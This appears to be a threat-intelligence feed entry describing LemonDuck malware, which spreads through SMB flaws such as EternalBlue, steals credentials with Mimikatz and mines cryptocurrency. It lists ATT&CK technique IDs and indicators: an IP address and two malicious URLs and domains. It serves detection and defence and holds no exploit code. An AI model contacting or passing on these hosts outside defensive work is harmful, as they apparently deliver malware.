LemonDuck Malware Exploiting SMB Vulnerabilities
Oct. 9, 2024, 11:35 a.m.
Tags
External References
Description
LemonDuck malware has evolved into a versatile threat, targeting both Windows and Linux systems. It exploits SMB vulnerabilities, particularly EternalBlue, to gain network access. The malware uses brute-force attacks, creates hidden administrative shares, and executes malicious actions via batch files and PowerShell scripts. It ensures persistence through scheduled tasks, disables Windows Defender, and employs anti-detection mechanisms. The attack includes cryptomining, system compromise, and lateral movement. LemonDuck disguises itself as legitimate system services, manipulates firewall settings, and uses base64 encoding for obfuscation. It also utilizes Mimikatz for credential theft and employs multiple techniques for stealth and repeated execution.
Date
Published: Oct. 9, 2024, 11:13 a.m.
Created: Oct. 9, 2024, 11:13 a.m.
Modified: Oct. 9, 2024, 11:35 a.m.
Indicators
211.22.131.99
http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP
http://t.amynx.com/gim.jsp
w.zz3r0.com
t.amynx.com
Attack Patterns
LemonDuck
LemonDuck
T1021.002
T1568
T1053.005
T1110
T1059.003
T1059.001
T1571
T1036.005
T1562.001
T1070
T1055
T1140
T1027
T1112
T1190
T1078
CVE-2017-0144
Additional Informations
Taiwan